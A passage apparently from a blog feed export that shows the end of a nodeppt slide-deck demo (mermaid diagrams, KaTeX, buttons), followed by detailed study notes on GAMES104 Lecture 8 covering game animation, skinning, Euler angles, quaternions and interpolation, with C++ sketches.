    b: {
    fontSize: 16,
    lineHeight: 33
    },
    per: {
    color: '#eee',
    backgroundColor: '#334455',
    padding: [2, 4],
    borderRadius: 2
    }
    }
    }
    },
    data:[
    {value:335, name:'直达'},
    {value:310, name:'邮件营销'},
    {value:234, name:'联盟广告'},
    {value:135, name:'视频广告'},
    {value:1048, name:'百度'},
    {value:251, name:'谷歌'},
    {value:147, name:'必应'},
    {value:102, name:'其他'}
    ]
    }
    ]
    }

    ```

    <slide class="aligncenter">

    ## Plugins: mermaid

    <slide :class="size-60">

    ## Basic sequence diagram {.aligncenter}


    <pre class="mermaid">sequenceDiagram
    Alice ->> Bob: Hello Bob, how are you?
    Bob-->>John: How about you John?
    Bob--x Alice: I am good thanks!
    Bob-x John: I am good thanks!
    Note right of John: Bob thinks a long<br/>long time, so long<br/>that the text does<br/>not fit on a row.

    Bob-->Alice: Checking with John...
    Alice->John: Yes... John, how are you?</pre>



    <slide :class="size-60">

    ## Message to self in loop {.aligncenter}

    <pre class="mermaid">sequenceDiagram
    participant Alice
    participant Bob
    Alice->>John: Hello John, how are you?
    loop Healthcheck
    John->>John: Fight against hypochondria
    end
    Note right of John: Rational thoughts<br/>prevail...
    John-->>Alice: Great!
    John->>Bob: How about you?
    Bob-->>John: Jolly good!</pre>

    <slide :class="size-80">

    ## Gantt {.aligncenter}


    <pre class="mermaid">gantt
    dateFormat YYYY-MM-DD
    title Adding GANTT diagram functionality to mermaid

    section A section
    Completed task :done, des1, 2014-01-06,2014-01-08
    Active task :active, des2, 2014-01-09, 3d
    Future task : des3, after des2, 5d
    Future task2 : des4, after des3, 5d

    section Critical tasks
    Completed task in the critical line :crit, done, 2014-01-06,24h
    Implement parser and jison :crit, done, after des1, 2d
    Create tests for parser :crit, active, 3d
    Future task in critical line :crit, 5d
    Create tests for renderer :2d
    Add to mermaid :1d

    section Documentation
    Describe gantt syntax :active, a1, after des1, 3d
    Add gantt diagram to demo page :after a1 , 20h
    Add another diagram to demo page :doc1, after a1 , 48h

    section Last section
    Describe gantt syntax :after doc1, 3d
    Add gantt diagram to demo page :20h
    Add another diagram to demo page :48h</pre>

    <slide :class="size-60">

    ## Flowchart support for fontawesome {.aligncenter}

    <pre class="mermaid">graph TD
    B["fa:fa-twitter for peace"]
    B-->C[fa:fa-ban forbidden]
    B-->D(fa:fa-spinner);
    B-->E(A fa:fa-camera-retro perhaps?);</pre>

    <slide class="aligncenter">

    ## Plugins: KaTex

    <slide class="bg-gradient-v" :class="size-60">

    ## KaTex {.aligncenter}

    | equation | description |
    | ------------------------------------------------------------ | ------------------------------------------------------------ |
    | $\nabla \cdot \vec{\mathbf{B}} = 0$ | divergence of $\vec{\mathbf{B}}$ is zero |
    | $\nabla \times \vec{\mathbf{E}}\, +\, \frac1c\, \frac{\partial\vec{\mathbf{B}}}{\partial t} = \vec{\mathbf{0}}$ | curl of $\vec{\mathbf{E}}$ is proportional to the rate of change of $\vec{\mathbf{B}}$ |
    | $\nabla \times \vec{\mathbf{B}} -\, \frac1c\, \frac{\partial\vec{\mathbf{E}}}{\partial t} = \frac{4\pi}{c}\vec{\mathbf{j}} \nabla \cdot \vec{\mathbf{E}} = 4 \pi \rho$ | _wha?_ |



    <slide :class="size-50 aligncenter">

    ## Others

    <slide :class="size-80">

    ::: {.content-left}

    ## Button

    [.button](){.button} [.button.radius](){.button.radius}

    [.button.ghost](){.button.ghost} [:fa-github: svg-icon](){.button}
    :::

    ::: {.content-left}

    ## Avatar

    ![](https://avatars2.githubusercontent.com/u/1073262?s=40&v=4){.avatar-40}
    ![](https://avatars2.githubusercontent.com/u/1073262?s=40&v=4){.avatar-48}
    ![](https://avatars2.githubusercontent.com/u/1073262?s=40&v=4){.avatar-56}
    ![](https://avatars2.githubusercontent.com/u/1073262?s=40&v=4){.avatar-64}
    ![](https://avatars2.githubusercontent.com/u/1073262?s=40&v=4){.avatar-72}
    ![](https://avatars2.githubusercontent.com/u/1073262?s=40&v=4){.avatar-80}

    (80, 72, 64, 56, 48, and 40).
    :::

    <slide :class="aligncenter size-50">

    ## List

    ----

    * Niubility!
    * WebSlides
    * Webpack build in
    * Markdown-it
    * Posthtml
    * Prismjs

    <slide :class="size-50">

    ## Table

    | Left-aligned | Center-aligned | Right-aligned |
    | :----------- | :------------: | ------------: |
    | git status | git status | git status |
    | git diff | git diff | git diff |
    | git status | git status | git status |


    <slide class="bg-purple" :class="size-50 aligncenter" image="http://h1.ioliu.cn/bing/SandiaSunrise_ZH-CN11155504388_1920x1080.jpg .dark">

    ## Speaker Mode

    Click **Url + [?mode=speaker](./?mode=speaker){.bg-primary style="font-size:120%"}** to show Speaker Mode.

    <slide class="bg-primary" :class="size-60 frame">

    ## View More Demos? {.text-serif.aligncenter}

    \* \* \* {.text-symbols}

    <nav class="aligncenter">
    * [:fa-th-large: Layout](./layout.html)
    * [:fa-tv: Background](./background.html)
    * [:fa-magic: Animation](./animation.html)
    * [:fa-cube: Component](./component.html)
    * [:fa-youtube: Media](./media.html)
    {.no-list-style}


    </nav>

    <slide class="bg-black-blue aligncenter" image="https://cn.bing.com/az/hprichbg/rb/PragueChristmas_EN-AU8649790921_1920x1080.jpg .dark">

    ## U work so hard, **but** lose out to those who write PPTs {.animated.tada}

    Use [nodeppt](https://github.com/ksky521/nodeppt) to knock out impressive slides with ease<br/> nodeppt, fuel for your life's comeback! {.text-into.animated.delay-800.fadeIn}

    [:fa-cloud-download: Github](https://github.com/ksky521/nodeppt){.button.animated.delay-1s.fadeInUp}

    Compile the Markdown file into static HTML:

    nodeppt build test.md

    Preview it on a local server:

    nodeppt serve test.md
    ]]>
    @@ -1861,7 +1861,7 @@ /posts/GAMES104-Animation/ - 资源

    Course

    Lecture 8: Basics of Animation Technology in Game Engines

    Animation System

    Basics of Animation Technology

    Humans have been trying to represent objects in motion.

    • The persistence of vision

    • Illusory motion

    Animation Techniques in Film

    The animation industry first grew out of film.

    • Hand-Drawn Animation

    • Cel Animation

    Cel animation is a traditional animation technique (also simply called traditional animation): characters and backgrounds are hand-painted onto transparent plastic or resin sheets, layered together, and photographed frame by frame. It dominated for decades, until computer animation arrived.

    • Computer Animation

    Animation Techniques in Games

    The earliest game animation was 2D; Doom, for instance, faked a 3D look with 2D techniques.

    • Rigid Hierarchy Animation (prone to mesh clipping)

    • Soft Skinned Animation

    • Physics Animation

    Challenges in Game Animation (1/3)

    Interactive and dynamic animation

    • Varies according to the interaction

    • Cooperates with other gameplay systems

    • Makes adjustments in complex environments

    Challenges in Game Animation (2/3)

    Real-time

    • Compute per frame (all animation work must finish within a single frame)

    • Massive animation data (disk and memory)

    Challenges in Game Animation (3/3)

    Realism

    • More vivid expression

    • More authentic experience

    • Facial Animation

    • Ragdoll Physics

    • Motion Matching

    Outline of Animation System

    • Basics of Animation Technology

      2D Animation

      3D Animation

      Skinned Animation Implementation

      Animation Compression

      Animation DCC

    Animation DCC refers to Digital Content Creation tools for animation: software suites used to produce film, TV, game and other digital media content. They help animators and artists author, edit and render animation and visual effects of considerable complexity and precision.

    • Advanced Animation Technology

      Animation Blend

      Inverse Kinematics

      Animation Pipeline

      Animation Graph

      Facial Animation

      Retargeting

    2D Animation Techniques in Games

    2D Animation - Sprite Animation

    The electronic equivalent of cel animation

    • A sprite is a small bitmap that can be overlaid on top of a background image without disrupting it

    • The sequence of frames is designed so that it animates smoothly even when it is repeated indefinitely

    The sprite-like animation technique in pseudo-3D games

    • Each viewing angle of the "3D" object is drawn as a separate 2D image.

    Sprite Animation in Modern Games

    Application

    • 2D character

      • Sprite on a 2D background image

      • Sprite on top of a 3D rendered environment

    • Game effects

      • Sprite sheet textures for particles

    Live2D

    A technology to generate 2D animation without a 3D model

    • Usually refers to the eponymous software series employing the technology, created by Live2D Ltd.

    • Can produce dynamic characters, especially anime-style characters, without a 3D model

    • Works by applying translation, rotation and other transformations to different parts and layers of an image

    • Combined with real-time motion capture, it can be used for vtubing

    Making a Live2D animation

    Prepare resources

    • Divide the original character image into different parts

    • Set a "draw order" for each part for later use

    Transform images using control points on each part

    • An "ArtMesh", defined by vertices, edges and polygons, can be generated automatically for each part

    • Control points can be used to help deform the "ArtMesh"

    Set animation "key frames"

    • Set "key frames" to drive animation interpolation

    3D Animation Techniques in Games

    DoF (Degrees of Freedom)

    • Refers to the number of independent variables or parameters of a system

    DoF for rigid objects

    • 6 DoFs per object or sub-part

    Rigid Hierarchical Animation

    • The earliest approach to 3D character animation

    • A character is modeled as a collection of rigid pieces

    • The rigid pieces are constrained to one another in a hierarchical fashion

    Per-vertex Animation

    Compared with skinned animation, per-vertex animation is better suited to simulating fluids or cloth.

    • Most flexible (3 DoFs per vertex)

    • Mostly implemented via Vertex Animation Textures (VAT)

    • Suitable for complex morphing

    • Needs massive amounts of data

    Morph Target Animation

    • A variation on per-vertex animation

      • Uses key frames with LERP instead of sequence frames (e.g. 30 frames per second)

    • Suitable for facial expressions

    3D Skinned Animation

    • The mesh (or skin) is bound to the joints of the skeleton

    • Each vertex can be weighted to multiple joints

    Advantages

    • Needs less data than per-vertex animation

    • The mesh can be animated in a natural way (like human "skin")

    2D Skinned Animation

    Derived from 3D skinned animation

    • Break the character up into various body parts

    • Create body-part meshes and piece them together

    • Rigging, skinning and animation

    Physics-based Animation

    • Ragdoll

    • Cloth and fluid simulation

    • Inverse Kinematics (IK)

    Animation Content Creation

    Ways of creating animation content:

    • Digital Content Creator + Animator

    • Motion Capture

    Skinned Animation Implementation

    How to Animate a Mesh

    1. Create a mesh for a binding pose

    2. Create a binding skeleton for the mesh

    3. "Paint" per-vertex skinning weights onto the related skeleton

    4. Animate the skeleton into the desired pose

    5. Animate the skinned vertices from the skeleton and skinning weights

    Different Spaces

    Three coordinate spaces are involved:

    • Local space, model space and world space

    Skeleton for Creatures

    Comprised of a hierarchy of rigid pieces known as joints

    • One joint is selected as the root

    • Every joint has a parent joint except the root

    Joint vs. Bone

    • The joints are the objects directly manipulated by the animator to control motion

    • The bones are the empty space between the joints

    Humanoid Skeleton in Real Games

    Number of joints in a humanoid skeleton

    • Normal: 50~100 joints

    • May exceed 300+ joints once facial joints and gameplay joints are included

    Joints for Gameplay

    • Additional joints

    • Weapon joint

    • Mount joint

    Where to Start the Skeleton - Root Joint

    Typically the hip becomes the pelvis joint, and the center between the feet becomes the root joint.

    Root joint

    • The center of the feet

    • Convenient for touching the ground

    Pelvis joint

    • The first child joint of the root joint

    • Where the human upper and lower body separate

    How to Handle a Horse Skeleton?

    A horse's pelvis joint and root joint are usually placed in the analogous positions.

    Bind Animation for Objects

    Attach the two skeletons' bind points

    Bind Pose - T-pose vs. A-pose

    The pose of the 3D mesh prior to being bound to the skeleton

    • Keep the limbs away from the body and from each other, making the process of binding the vertices to the joints easier

    • Usually close to a natural pose

    T-pose vs. A-pose

    • Shoulders in A-pose are more relaxed (a T-pose tends to squeeze and distort the shoulder region, which is why A-pose is now preferred)

    • Meshes deform more cleanly from an A-pose

    Skeleton Pose

    Skeleton pose: a skeleton is posed by transforming its joints from the bind pose

    Joint Pose (9 DoFs)

    • Orientation (3 DoFs)

    • Position (3 DoFs)

    • Scale (3 DoFs)

    Math of 3D Rotation

    2D Orientation Math

    A 2D rotation is fully described by a single angle $\alpha$.

    3D Orientation Math

    Euler Angle

    Euler angles describe a rotation in three dimensions.

    • 3D rotation about a single axis: rotate about one of the $x,y,z$ axes by $\alpha,\beta,\gamma$

    • A general 3D rotation is combined from rotations about the $x, y, z$ axes applied sequentially

    Euler Angle

    Euler angles provide a brief description of 3D rotation and are widely used in many fields

    • Yaw angle $\psi$: the aircraft turns left/right
    • Pitch angle $\theta$: the nose tilts up/down
    • Roll angle $\phi$: the aircraft banks left/right

    Order Dependence of Euler Angles

    Euler-angle rotation looks intuitive, but the order of the rotations changes the final result.

    Gimbal Lock

    Gimbal lock is a 3D phenomenon that typically arises when rotations are described with Euler angles, especially with a physical gimbal structure. It costs one rotational degree of freedom, so in some configurations the object can no longer rotate as expected.

    Euler angles express an orientation as rotation angles about three axes (usually X, Y, Z); when two of those axes become aligned during rotation, gimbal lock occurs. A gimbal is a mechanical structure of nested axes, each free to spin about itself; once two of its axes align, the third loses its freedom. Concretely, when two axes are aligned, rotations no longer act in three independent directions: turning one axis also drags the others, producing unexpected results and a lost DoF.

    To avoid gimbal lock, rotations can be represented in other ways, such as quaternions, which do not suffer from it; when Euler angles must be used, certain tricks and constraints help reduce the chance of it occurring.

    Degeneration of Euler Angles

    Problems of Euler Angles

    Rotation combination

    Rotation about a certain axis

    • Gimbal lock

      Gimbal lock occurs because of the loss of one DoF

    • Hard to interpolate

      The singularity problem makes interpolation difficult

    • Difficult rotation combination

      Combining rotations requires rotation matrices

    • Hard to rotate about a certain axis

      Easy to rotate about the $x,y,z$ axes, but hard about any other axis

    Quaternion

    Quaternions are used to represent rotations.

    They are compact, immune to gimbal lock, and easy to interpolate. Unity, for example, uses quaternions internally for all rotations.

    They are based on complex numbers and are not easy to grasp intuitively. You almost never access or modify individual quaternion components ($x$, $y$, $z$, $w$); most of the time you take existing rotations (e.g. from a Transform) and build new ones from them (e.g. smoothly interpolating between two rotations). The quaternion functions you use the vast majority of the time are Quaternion.LookRotation, Quaternion.Angle, Quaternion.Euler, Quaternion.Slerp, Quaternion.FromToRotation and Quaternion.identity (the remaining functions serve fairly exotic use cases).

    Quaternions are introduced to solve the gimbal lock problem.

    "Every morning in the early part of October 1843, on my coming down to breakfast, your brother William Edwin and yourself used to ask me: 'Well, Papa, can you multiply triples?' Whereto I was always obliged to reply, with a sad shake of the head, 'No, I can only add and subtract them.'"

    Complex Number and 2D Rotation

    Complex numbers are introduced to discuss 2D rotation.

    Complex Number

    • Definition

      $c=a+bi\ (a,b\in\mathbb{R})$

      $i^2=-1$

    • Represented as a vector

      $c=\begin{bmatrix}a\\b\end{bmatrix}$

    • Product

      $c_1=a+bi\quad c_2=c+di\quad c_1c_2=\begin{bmatrix}a&-b\\b&a\end{bmatrix}\begin{bmatrix}c\\d\end{bmatrix}$

    If the angle $\alpha$ is represented by $z=a+bi$ and the angle $\beta$ by $w=c+di$, then $\alpha+\beta$ is represented by $zw=(a+bi)(c+di)$.

    Quaternion

    By analogy with 2D, quaternions represent rotations in three dimensions.

    Quaternion

    • Definition

      $q=a+bi+cj+dk\quad(a,b,c,d\in\mathbb{R})$

      $i^2=j^2=k^2=ijk=-1$

    • Represented as a pair of two parts (a real number and a vector)

      $q=(a,v)\quad(v=\begin{bmatrix}b\\c\\d\end{bmatrix},\ a,b,c,d\in\mathbb{R})$

    • Product

      $q_1=a+bi+cj+dk\quad q_2=e+fi+gj+hk$

      $q_1q_2=\begin{bmatrix}a&-b&-c&-d\\b&a&-d&c\\c&d&a&-b\\d&-c&b&a\end{bmatrix}\begin{bmatrix}e\\f\\g\\h\end{bmatrix}$

      $q_1q_2$ denotes rotating by $q_1$ first and then by $q_2$

    • Norm

      $||q||=\sqrt{a^2+b^2+c^2+d^2}$

    • Conjugate

      $q^*=a-bi-cj-dk$

    • Inverse

      $q^{-1}q=qq^{-1}=1$

    Euler Angle to Quaternion

    $$q=[1\quad i\quad j\quad k]\begin{bmatrix}\cos(\gamma/2)\cos(\beta/2)\cos(\alpha/2)+\sin(\gamma/2)\sin(\beta/2)\sin(\alpha/2)\\\sin(\gamma/2)\cos(\beta/2)\cos(\alpha/2)-\cos(\gamma/2)\sin(\beta/2)\sin(\alpha/2)\\\cos(\gamma/2)\sin(\beta/2)\cos(\alpha/2)+\sin(\gamma/2)\cos(\beta/2)\sin(\alpha/2)\\\cos(\gamma/2)\cos(\beta/2)\sin(\alpha/2)-\sin(\gamma/2)\sin(\beta/2)\cos(\alpha/2)\end{bmatrix}$$
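
    A minimal C++ sketch of this conversion (not from the course; the `Quat` struct and the ZYX convention, with $\gamma/\beta/\alpha$ as rotations about x/y/z, are assumptions chosen to match the matrix above):

    ```cpp
    #include <cmath>

    // Hypothetical plain quaternion type: q = w + xi + yj + zk.
    struct Quat { float w, x, y, z; };

    // Implements the matrix formula above. Assumed convention: gamma = roll
    // about x, beta = pitch about y, alpha = yaw about z, composed in that
    // order; all angles in radians.
    Quat eulerToQuaternion(float alpha, float beta, float gamma) {
        const float ca = std::cos(alpha * 0.5f), sa = std::sin(alpha * 0.5f);
        const float cb = std::cos(beta  * 0.5f), sb = std::sin(beta  * 0.5f);
        const float cg = std::cos(gamma * 0.5f), sg = std::sin(gamma * 0.5f);
        return { cg * cb * ca + sg * sb * sa,    // real part (the "1" row)
                 sg * cb * ca - cg * sb * sa,    // i
                 cg * sb * ca + sg * cb * sa,    // j
                 cg * cb * sa - sg * sb * ca };  // k
    }
    ```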

    Rotation by Quaternion

    Quaternion

    • Vector to quaternion

      • A 3D vector $\mathbf v$ can be written in quaternion format as follows:

        $v_q=(0,v)=bi+cj+dk\quad v=\begin{bmatrix}b\\c\\d\end{bmatrix}$

    • Rotation

      $v_q^{\prime}=qv_qq^*=qv_qq^{-1}$

    $$q^*=a-bi-cj-dk$$

    $$q_1=a+bi+cj+dk\quad q_2=e+fi+gj+hk\quad q_1q_2=\begin{bmatrix}a&-b&-c&-d\\b&a&-d&c\\c&d&a&-b\\d&-c&b&a\end{bmatrix}\begin{bmatrix}e\\f\\g\\h\end{bmatrix}$$

    Quaternion to Rotation Matrix

    $$q=(a,b,c,d)\quad||q||=1$$

    $$v^{\prime}=\begin{bmatrix}1-2c^2-2d^2&2bc-2ad&2ac+2bd\\2bc+2ad&1-2b^2-2d^2&2cd-2ab\\2bd-2ac&2ab+2cd&1-2b^2-2c^2\end{bmatrix}v$$

    Rotation Math by Quaternion

    Inverse Rotation

    $$q^{-1}=\frac{q^*}{||q||^2}$$

    Rotation Combination

    $$\begin{aligned}
    q_1^*q_2^*&=(q_2q_1)^* \\
    v^{\prime}&=q_1vq_1^* \\
    v^{\prime\prime}&=q_2v^{\prime}q_2^* \\
    &=q_2q_1vq_1^*q_2^* \\
    &=(q_2q_1)v(q_2q_1)^*
    \end{aligned}$$

    Quaternion between Two Unit Vectors

    $$
    w=u\times v \\
    q=[u\cdot v+\sqrt{(w\cdot w)+(u\cdot v)^2},\ w] \\
    (||u||=||v||=1)
    $$

    Given-Axis Rotation by Quaternion

    Quaternion

    • Vector to quaternion

      • A 3D vector $\mathbf v$ can be written in quaternion format as follows:

        $v_q=(0,v)=bi+cj+dk\quad v=\begin{bmatrix}b\\c\\d\end{bmatrix}$

    • Rotation

      • For a vector $\mathbf v$ rotated about the unit axis $u$ by the angle $\theta$, the resulting vector $v'_q$ is

    $$q=(\cos(\tfrac\theta2),\sin(\tfrac\theta2)x_u,\sin(\tfrac\theta2)y_u,\sin(\tfrac\theta2)z_u)$$

    $$v'_q=qv_qq^*=qv_qq^{-1}$$

    where $u=\begin{bmatrix}x_u\\y_u\\z_u\end{bmatrix}$ is a unit vector representing the rotation axis.
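
    As a concrete illustration, here is a small C++ sketch of $v' = q v q^*$ with $q$ built from a unit axis and an angle; the `Vec3`/`Quat` types and function names are hypothetical helpers, and the Hamilton product simply writes out the 4×4 matrix form shown earlier:

    ```cpp
    #include <cmath>

    struct Vec3 { float x, y, z; };
    struct Quat { float w, x, y, z; };             // q = w + xi + yj + zk

    // Hamilton product q1 * q2 (the 4x4 matrix form above, written out).
    Quat mul(const Quat& q1, const Quat& q2) {
        return {
            q1.w * q2.w - q1.x * q2.x - q1.y * q2.y - q1.z * q2.z,
            q1.w * q2.x + q1.x * q2.w + q1.y * q2.z - q1.z * q2.y,
            q1.w * q2.y - q1.x * q2.z + q1.y * q2.w + q1.z * q2.x,
            q1.w * q2.z + q1.x * q2.y - q1.y * q2.x + q1.z * q2.w
        };
    }

    // Rotate v about the unit axis u by angle theta (radians): v' = q v q*.
    Vec3 rotate(const Vec3& v, const Vec3& u, float theta) {
        const float h = theta * 0.5f, s = std::sin(h);
        const Quat q  = { std::cos(h), s * u.x, s * u.y, s * u.z };
        const Quat qc = { q.w, -q.x, -q.y, -q.z }; // conjugate q* (= q^-1 for unit q)
        const Quat vq = { 0.0f, v.x, v.y, v.z };   // embed v as a pure quaternion
        const Quat r  = mul(mul(q, vq), qc);
        return { r.x, r.y, r.z };
    }
    ```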

    Joint Pose

    Joint Pose - Orientation

    • Rotation -> changes the orientation of joints

    • Most skeleton poses change the orientations of joints only

    Joint Pose - Position

    • Translation -> changes position

    • Translate point $P$ to point $P'$ by the vector $T$

    • Usually unchanged in a humanoid skeleton, except for the pelvis, facial joints and other special joints

    • Used for stretching models

    Joint Pose - Scale

    • Scale -> changes the size of the model

    • Uniform vs. non-uniform scale

    • Widely used in facial animation

    • Uniform and non-uniform scaling of facial joints

    Joint Pose - Affine Matrix

    Translation, rotation and scale are combined into a single affine matrix.

    Joint Pose - Local Space to Model Space

    For a joint $j$ in a skinned mesh

    • $p(j)$: joint $j$'s parent joint

    • $M^l_{p(j)}$: joint $j$'s parent joint pose in local space

    $M^m_J$: joint $J$'s pose in model space

    • Walking the skeletal hierarchy from $J$ to the root:

    $$M_{J}^{m}=\prod_{j=J}^{0}M_{p(j)}^{l}$$

    Joint Pose Interpolation - Local Space vs. Model Space

    Local Space

    • Less data, thanks to delta transforms

    • Convenient for interpolation or blending

    Model Space

    • Incorrect for interpolation

    Single-Joint Skinning

    Vertex $V$'s position in joint $J$'s local space is fixed

    Attach the vertices of a mesh to a posed skeleton

    • Each vertex can be bound to one or more joints with a weight parameter

    • The vertex position in each bound joint's local space is fixed

    Skinning Matrix

    Bind pose: the skeleton pose used for binding

    For a mesh vertex $V$ which is bound to a joint $J$

    • $V^m_b$: $V$'s position in model space within the bind pose

    • $V^l_b$: $V$'s position in local space within the bind pose

    • $M^m_{b(J)}$: $J$'s pose in model space within the bind pose

    $V$'s position in local space at any time $t$ is fixed:

    $$V^l(t)\equiv V^l_b=(M_{b(J)}^m)^{-1}\cdot V_b^m$$

    $M^m_J(t)$: joint $J$'s pose in model space at time $t$

    $$M_J^m(t)=\prod_{j=J}^{0}M^l_{p(j)}(t)$$

    $V^m(t)$: $V$'s position in model space at time $t$

    $$V^m(t)=M_J^m(t)\cdot V^l_b=M_J^m(t)\cdot(M_{b(J)}^m)^{-1}\cdot V_b^m$$

    • $(M_{b(J)}^m)^{-1}$: the inverse bind pose matrix

    Skinning matrix:

    $$K_J=M_J^m(t)\cdot(M_{b(J)}^m)^{-1}$$

    Representing a Skeleton in Memory

    • The name of the joint, either as a string or a hashed 32-bit string id

    • The index of the joint's parent within the skeleton

    • The inverse bind pose transform, the inverse of the product of the bind pose's translation, rotation and scale

    struct Joint {
        const string m_joint_name;                 // the name of the joint
        UInt8       m_parent_joint_index;          // index of the parent joint, or 0xFF if root
        Translation m_bind_pose_translation;       // bind pose: translation
        Rotation    m_bind_pose_rotation;          // bind pose: rotation
        Scale       m_bind_pose_scale;             // bind pose: scale
        Matrix4x3   m_inverse_bind_pose_transform; // inverse bind pose; derivable by computation,
                                                   // but precomputed to save time
    };

    struct Skeleton {
        UInt  m_joint_count; // number of joints
        Joint m_joints[];    // array of joints
    };

    Skinning Matrix Palette

    An array of skinning matrices, one per joint

    • To be used by the GPU in shaders

    • Optimization: fold in the transform matrix $M^w$ from model space to world space

      The optimized skinning matrix of joint $J$ is

    $$K'_J=M^w\cdot M_J^m(t)\cdot(M_{b(J)}^m)^{-1}$$
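
    A minimal sketch of how such a palette might be built each frame, assuming joints are stored parent-before-child; `Mat4`, `JointRT` and the function names are hypothetical stand-ins for engine types:

    ```cpp
    #include <cstdint>
    #include <vector>

    // Hypothetical 4x4 matrix with a plain row-by-column multiply.
    struct Mat4 {
        float m[4][4];
        Mat4 operator*(const Mat4& o) const {
            Mat4 r{};
            for (int i = 0; i < 4; ++i)
                for (int j = 0; j < 4; ++j)
                    for (int k = 0; k < 4; ++k)
                        r.m[i][j] += m[i][k] * o.m[k][j];
            return r;
        }
    };

    struct JointRT {
        uint8_t parentIndex;      // 0xFF for the root
        Mat4    inverseBindPose;  // (M^m_b(J))^-1, precomputed at bind time
    };

    // Build the palette K'_J = M^w * M^m_J(t) * (M^m_b(J))^-1 for one frame.
    // localPose[j] is joint j's pose in its parent's space at time t; joints
    // are assumed ordered so that every parent precedes its children.
    std::vector<Mat4> buildSkinningPalette(const std::vector<JointRT>& joints,
                                           const std::vector<Mat4>& localPose,
                                           const Mat4& modelToWorld) {
        std::vector<Mat4> modelPose(joints.size());
        std::vector<Mat4> palette(joints.size());
        for (size_t j = 0; j < joints.size(); ++j) {
            // Local -> model space walk: M^m_J = M^m_p(J) * M^l_J.
            modelPose[j] = (joints[j].parentIndex == 0xFF)
                         ? localPose[j]
                         : modelPose[joints[j].parentIndex] * localPose[j];
            palette[j] = modelToWorld * modelPose[j] * joints[j].inverseBindPose;
        }
        return palette;
    }
    ```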

    Weighted Skinning with Multiple Joints

    For a mesh vertex $V$ which is bound to $N$ joints

    • $W_i$: the skinning weight of the $i$-th bound joint

    Weighted Skinning Blend

    For a vertex $V$ which is bound to $N$ joints $J_0$ to $J_{N-1}$

    • $K_{J_i}(t)$: the skinning matrix of joint $J_i$ at time $t$

    Transform $V$'s position in joint $J_i$'s local space to model space:

    $$V_{J_i}^m(t)=K_{J_i}(t)\cdot V_{b(J_i)}^m$$

    $V$'s position in model space:

    $$V^m(t)=\sum_{i=0}^{N-1}W_i\cdot V_{J_i}^m(t)$$
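
    In practice this blend is a small loop per vertex; a hedged C++ sketch (the types and names are illustrative, and the weights are assumed to sum to 1):

    ```cpp
    struct Vec3 { float x, y, z; };
    struct Mat4 { float m[4][4]; };

    // Transform a point by an affine matrix (implicit w = 1).
    Vec3 transformPoint(const Mat4& k, const Vec3& p) {
        return { k.m[0][0]*p.x + k.m[0][1]*p.y + k.m[0][2]*p.z + k.m[0][3],
                 k.m[1][0]*p.x + k.m[1][1]*p.y + k.m[1][2]*p.z + k.m[1][3],
                 k.m[2][0]*p.x + k.m[2][1]*p.y + k.m[2][2]*p.z + k.m[2][3] };
    }

    // Weighted skinning: V^m(t) = sum_i W_i * (K_Ji(t) * V^m_b).
    Vec3 skinVertex(const Vec3& bindPos,      // V^m_b, bind-pose model space
                    const Mat4* palette,      // skinning matrix per joint
                    const int* jointIndices,  // the N bound joints
                    const float* weights, int n) {
        Vec3 out{0.0f, 0.0f, 0.0f};
        for (int i = 0; i < n; ++i) {
            const Vec3 p = transformPoint(palette[jointIndices[i]], bindPos);
            out.x += weights[i] * p.x;
            out.y += weights[i] * p.y;
            out.z += weights[i] * p.z;
        }
        return out;
    }
    ```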

    Clip

    A sequence of skeleton poses

    Interpolation between Poses

    • An animation's timeline is continuous

    Interpolation

    • Calculate the pose between key poses

    Simple Interpolation of Translation and Scale

    • Linear interpolation (LERP)

      $f(x)=(1-\alpha)f(x_1)+\alpha f(x_2)$

      $\alpha=\frac{x-x_1}{x_2-x_1},\ x_1<x_2,\ x\in[x_1,x_2]$

    Translation:

    $$T(t)=(1-\alpha)T(t_1)+\alpha T(t_2)$$

    Scale:

    $$S(t)=(1-\alpha)S(t_1)+\alpha S(t_2)$$

    Quaternion Interpolation of Rotation

    • NLERP for quaternions

      • Linear interpolation

        $q_t=\mathrm{Lerp}(q_{t_1},q_{t_2},t)=(1-\alpha)q_{t_1}+\alpha q_{t_2}$

        $\alpha=\frac{t-t_1}{t_2-t_1},\ t_1<t_2,\ t\in[t_1,t_2]$

      • Normalization

        $q_t^{\prime}=\mathrm{Nlerp}(q_{t_1},q_{t_2},t)=\frac{(1-\alpha)q_{t_1}+\alpha q_{t_2}}{||(1-\alpha)q_{t_1}+\alpha q_{t_2}||}$

    Shortest-Path Fix for NLERP

    • The shortest path

    $$q_t=\begin{cases}\frac{(1-\alpha)q_{t_1}+\alpha q_{t_2}}{||(1-\alpha)q_{t_1}+\alpha q_{t_2}||}&q_{t_1}\cdot q_{t_2}\geq0\\\frac{(1-\alpha)q_{t_1}-\alpha q_{t_2}}{||(1-\alpha)q_{t_1}-\alpha q_{t_2}||}&q_{t_1}\cdot q_{t_2}<0\end{cases}$$

    With

    $$\begin{aligned}&q_{t_1}=a+bi+cj+dk\\&q_{t_2}=e+fi+gj+hk\end{aligned}$$

    the dot product works out to:

    $$\begin{aligned}
    q_{t_1}\cdot q_{t_2}&=ae+bf+cg+dh \\
    &=\cos(\theta)\,||q_{t_1}||\,||q_{t_2}||
    \end{aligned}$$

    Problem of NLERP

    Non-constant angular speed of NLERP

    SLERP: Uniform Rotation Interpolation

    SLERP for quaternions:

    $$\begin{aligned}&q_t=\mathrm{Slerp}(q_{t_1},q_{t_2},t)=\frac{\sin\left((1-t)\theta\right)}{\sin\left(\theta\right)}\cdot q_{t_1}+\frac{\sin\left(t\theta\right)}{\sin\left(\theta\right)}\cdot q_{t_2}\\&\theta=\arccos(q_{t_1}\cdot q_{t_2})\end{aligned}$$

    It relies on an inverse trigonometric function, so it is slower to compute.

    NLERP vs. SLERP

    • NLERP

      • Non-constant angular speed

      • Almost constant angular speed when $\theta$ is small

    • SLERP

      • Constant angular speed

      • May hit a divide-by-zero problem when $\theta$ is small

    • Combination

      • Widely used in AAA game development

      • Use SLERP when $\theta$ is large, and NLERP when $\theta$ is almost zero, as in the sketch below
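
    A sketch of that combination in C++ (the `Quat` type, the 0.9995 threshold and the function names are assumptions, not the course's code):

    ```cpp
    #include <cmath>

    struct Quat { float w, x, y, z; };

    float dot(const Quat& a, const Quat& b) {
        return a.w*b.w + a.x*b.x + a.y*b.y + a.z*b.z;
    }

    Quat normalize(const Quat& q) {
        const float n = std::sqrt(dot(q, q));
        return { q.w/n, q.x/n, q.y/n, q.z/n };
    }

    // Interpolate between unit quaternions a and b with t in [0,1]:
    // SLERP when the angle is large, NLERP when it is nearly zero, with the
    // shortest-path fix (negate b when a.b < 0) applied in both branches.
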